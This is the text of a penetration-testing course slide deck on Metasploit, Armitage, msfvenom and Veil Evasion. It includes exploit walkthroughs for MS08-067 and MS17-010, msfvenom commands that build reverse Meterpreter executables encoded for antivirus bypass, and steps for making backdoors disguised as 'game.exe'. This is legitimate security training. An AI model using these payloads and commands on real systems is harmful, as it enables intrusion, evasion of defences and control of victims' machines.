Professional Documents
Culture Documents
Pertemuan 7 Kelas Pentest - Metasploit - Final
Pertemuan 7 Kelas Pentest - Metasploit - Final
• Install Metasploit
• POC
Copyright ©TAALENTA
OVERVIEW METASPLOIT
• Leader of Exploit Framework, an advanced
open-source platform for developing, testing,
and using exploit code written in ruby.
• First time was created by H. D. Moore in
2003 as a portable network tool using Perl.
The Metasploit Framework had been
completely rewritten in Ruby in 2007.
• On October 21, 2009, RAPID 7 acquired
Metasploit Project
• RAPID 7 is a security company that provides
unified vulnerability management solutions.
• Rapid 7 and security community still support
by constantly updated Metasploit with the
new exploits
Copyright ©TAALENTA
OVERVIEW METASPLOIT
• METASPLOIT FRAMEWORK – Community Edition
• METASPLOIT PRO – Commercial Enterprise Edition
Copyright ©TAALENTA
INSTALL METASPLOIT
Installation on Xubuntu:
Command:
sudo curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-
wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
Copyright ©TAALENTA
START METASPLOIT
Command : msfconsole
Copyright ©TAALENTA
ARCHITECTURE OF METASPLOIT
Copyright ©TAALENTA
Metasploit User Interfaces
• Msfconsole – Console interactive that most commonly used
• Armitage – Graphical User Interface (GUI), a third party add-on to
MSF
Copyright ©TAALENTA
ARCHITECTURE OF METASPLOIT
REX
MSF: Core
Modules
Datastore EventDispatcher ModuleManager PluginManager
Payloads
Framework Console Framework
Plugins Exploits
MSF: Base
Encoders
Config Loging Serializer Simple Sessions
Nops
MSF: UI
Aux
Console CLI WebUI GUI Armitage
Copyright ©TAALENTA
ARCHITECTURE OF METASPLOIT
Directory :
/opt/metasploit-framework/
/opt/metasploit-framework/bin/
/opt/metasploit-framework/embedded/
/opt/metasploit-framework/LICENSES
Copyright ©TAALENTA
ARCHITECTURE OF METASPLOIT
Directory :
/opt/metasploit-framework/embedded/framework/
/opt/metasploit-framework/embedded/framework/modules
Copyright ©TAALENTA
ARCHITECTURE OF METASPLOIT
Metasploit Libraries
Some of the most important libraries are outlined below.
REX
• The basic library for most tasks
• Handles sockets, protocols, text transformations, and others
• SSL, SMB, HTTP, XOR, Base64, Unicode
MSF::CORE
• Provides the “basic” API
• Defines the Metasploit Framework
MSF::BASE
• Provides the “friendly” API
• Provides simplified APIs for use in the Framework
Copyright ©TAALENTA
BASIC COMMANDS
msf6> help
Copyright ©TAALENTA
BASIC COMMANDS
Database Backend Commands
Important Commands:
• db_status
• db_nmap
• workspace
• hosts
• services
Copyright ©TAALENTA
BASIC COMMANDS
• msf6> workspace –h
• msf6> db_status
Copyright ©TAALENTA
BASIC COMMANDS
• Services –p 21 –c name,port,proto
• Services –R 192.168.1.7
Copyright ©TAALENTA
BASIC COMMANDS
Information Gathering using “db_nmap”
Copyright ©TAALENTA
AUXILIARY
Scanning smb version (Port 445)
Copyright ©TAALENTA
AUXILIARY
Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
DNS Enumeration
msf > use auxiliary/gather/dns_enum msf > set DOMAIN target
msf > run
FTP Server
msf > use auxiliary/server/ftp msf > set FTPROOT /tmp/ftproot msf > run
Proxy Server
msf > use auxiliary/server/socks4 msf > run
Copyright ©TAALENTA
FRAMEWORK COMPONENTS
Metasploit Meterpreter :
• Run as DLL Injection Payload on a target PC providing control over the
target system
Metasploit Venom :
• Create standalone payloads as executable, Ruby Script , or Shell Code
Copyright ©TAALENTA
SHELL & METERPRETER
Copyright ©TAALENTA
SHELL
Copyright ©TAALENTA
METERPRETER
Copyright ©TAALENTA
Meterpreter Commands
sysinfo Display system information backgound Move active session to background
ps List and display running processes edit (File name) Edit a file in vi editor
kill (PID) Terminate a running process shell Access shell on the target machine
getuid Display user ID migrate <PID> Switch to another process
upload or Upload / download a file idletime Display idle time of user
download screenshot Take a screenshot
pwd or lpwd Print working directory (local/remote) clearev Clear the system logs
cd or lcd Change directory (local or remote) ? Or Help Shoes all the commands
cat Display file content exit / quit; Exit the meterpreter Session
bglist Show background running scripts shutdown / Restart system
bgrun Make a script run in background reboot
bgkill Terminate a background process use Extension load
bgrun Move active session to background channel Show active channels
BIND AND REVERSE SHELL
Attacker REVERSE SHELL PC Victim
Copyright ©TAALENTA
WALKTROUGH
Exploit the target Walktrough Useful Command
1. Exploit : 1. Search:
use <module exploit> search <module exploit>
Copyright ©TAALENTA
MODULE EXPLOIT MS08_067_NETAPI
Search <text title of module>
Module : exploit/windows/smb/ms08_067_netapi
Copyright ©TAALENTA
MODULE EXPLOIT MS08_067_NETAPI
Show options
Copyright ©TAALENTA
MODULE EXPLOIT MS08_067_NETAPI
Setting RHOSTS, PAYLOAD, LPORT and exploit command
Copyright ©TAALENTA
WINDOWS SERVER 2003
USING PAYLOAD METERPRETER
Copyright ©TAALENTA
MODULE EXPLOIT MS17_010_PSEXEC
Search <text title of module>
Module : exploit/windows/smb/ms17_010_psexec
Use exploit :
use exploit/windows/smb/ms17_010_psexec
Copyright ©TAALENTA
MODULE EXPLOIT MS17_010_PSEXEC
Show options
Copyright ©TAALENTA
MODULE EXPLOIT MS17_010_PSEXEC
Change PAYLOAD from Shell into Meterpreter
Set Payload :
set PAYLOAD windows/meterpreter/reverse_tcp
Copyright ©TAALENTA
MODULE EXPLOIT MS17_010_PSEXEC
Exploit using -j is to running as background
Copyright ©TAALENTA
METERPRETER
Copyright ©TAALENTA
METERPRETER
Enter shell Windows
Exit to meterpreter
Copyright ©TAALENTA
METERPRETER
Copyright ©TAALENTA
PART II
Copyright ©TAALENTA
OVERVIEW
• KEY TAKEAWAYS DAY 6
• ARMITAGE
• EXPLOIT WINDOWS 2008 SERVER
• EXPLOIT METASPLOITABLE 2
• SHIKATA_GA_NAI (MSFVENOM /Client Side Attacks)
• VEIL EVASION FRAMEWORK
Copyright ©TAALENTA
ARMITAGE
Armitage is a GUI front-end for the Metasploit
Framework developed by Raphael Mudge with the goal of
helping security professionals better understand hacking and
to help them realize the power of Metasploit. It was originally
made for Cyber Defense Exercises, but has since expanded its
user base to other penetration testers
Copyright ©TAALENTA
SETUP ARMITAGE
Install Armitage
msfupdate
Setup database.yml
cd /opt/metasploit-framework/embedded/framework/config/
sudo cp /home/pentest/.msf4/database.yml .
Copyright ©TAALENTA
SETUP ARMITAGE
MSF_DATABASE_CONFIG="/opt/metasploit framework/embedded/framework/config/database.yml"
export MSF_DATABASE_CONFIG="/opt/metasploit-framework/embedded/framework/config/database.yml"
Msfdb reinit
Copyright ©TAALENTA
SETUP ARMITAGE
sudo -E armitage
Copyright ©TAALENTA
SET EXPLOIT RANK (1)
Copyright ©TAALENTA
LISTENERS (SET LHOST) (2)
Settings the Listeners HOST (LHOST):
Set LHOSTà Your Machine’s IP Address
Copyright ©TAALENTA
REVERSE (WAIT FOR) (3)
Setting the Listeners Tunnel (Bind or Reverse) :
Listeners à Reverse (wait for)
Copyright ©TAALENTA
ADD HOSTS (4)
Copyright ©TAALENTA
ADDED 1 HOST (5)
Copyright ©TAALENTA
HOSTS (NMAP SCAN) (6)
Nmap Scan à Intense Scan
Copyright ©TAALENTA
HOSTS (NMAP SCAN) (7)
Nmap Scan à Intense Scan, no ping
Copyright ©TAALENTA
HOSTS (SCAN COMPLETE) (8)
Copyright ©TAALENTA
FIND ATTACKS (9)
Copyright ©TAALENTA
FIND ATTACKS (PROCESS RUNNING) (10)
Copyright ©TAALENTA
FIND ATTACKS (ATTACK ANALYSIS COMPLETE) (11)
Copyright ©TAALENTA
HAIL MARY (12)
Copyright ©TAALENTA
HAIL MARY (OPTIONS) (13)
Copyright ©TAALENTA
HAIL MARY (PROGRESS) (14)
Copyright ©TAALENTA
HAIL MARY (COMPROMISE) (15)
Copyright ©TAALENTA
METERPRETER, INTERACT, METERPRETER SHELL (16)
Copyright ©TAALENTA
METERPRETER SHELL (17)
Copyright ©TAALENTA
Japanese Phrase Meaning
Copyright ©TAALENTA
MSFVENOM
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone
files and optionally encode them.
Command :
‘'-l payloads’ to get a list of payloads.
$ msfvenom –p [PayloadPath] –f [FormatType] LHOST=[LocalHost (if reverse
connection)] LPORT=[LocalPort] x86/shikata_ga_nai
Example
Reverse Meterpreter payload as an executable and redirected into a file:
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 x86/shikata_ga_nai > cmd.exe
Copyright ©TAALENTA
MSFVENOM
Format Options (specified with –f)
--help-formats – List available output formats exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c– Ccode
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l
encoders' to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example
Encode a payload from msfpayload 10 times using shikata- ga-nai encoder and output as executable:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 10 -e x86/shikata_ga_nai -
f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Copyright ©TAALENTA
A FEW EXAMPLE CREATING BACKDOORS
Copyright ©TAALENTA
Copyright ©TAALENTA
SETUP
Copyright ©TAALENTA
SETUP
Copyright ©TAALENTA
SETUP
• Wine installation and configuration, please wait
• Error failed message it’s okay and please continue and wait
Copyright ©TAALENTA
SETUP
• Well done!, Veil installation is finish!
Copyright ©TAALENTA
VEIL FRAMEWORK
• Running Veil Evaison
Copyright ©TAALENTA
VEIL FRAMEWORK
• Available Payloads
Command :
use <number>
Example:
use 7
Copyright ©TAALENTA
VEIL FRAMEWORK
Copyright ©TAALENTA
VEIL FRAMEWORK
• Payload Options
Command :
set LHOST <your IP Address as listener>
set LPORT <your port >
Copyright ©TAALENTA
VEIL FRAMEWORK
• Fill the name and process creating the Backdoor
Input name of your backdoor payload:
Example:
(default is payload): game
Result:
/var/lib/veil/output/compiled/game.exe
Copyright ©TAALENTA
POC (Proof of Concept)
ADDRESS:
Example: http://192.168.1.13:8000/
Copyright ©TAALENTA
POC (Proof of Concept)
Copyright ©TAALENTA
POC (Proof of Concept)
Copyright ©TAALENTA
POC (Proof of Concept)
Copyright ©TAALENTA
POC (Proof of Concept)
Copyright ©TAALENTA
POC (Proof of Concept)
Copyright ©TAALENTA
POC (Proof of Concept)
Copyright ©TAALENTA
POC (Proof of Concept)
Copyright ©TAALENTA
RUNNING LISTENER
Until you see “exploit –j” and “started Reverse TCP handler on
<your Machine’s IP Address/Listener Address>:<Port Listener>
Example :
Started Reverse TCP handler on 192.168.1.13:7777
Copyright ©TAALENTA
ENTER METERPRETER
Copyright ©TAALENTA
ENTER METERPRETER
Copyright ©TAALENTA
THANK YOU
Copyright ©TAALENTA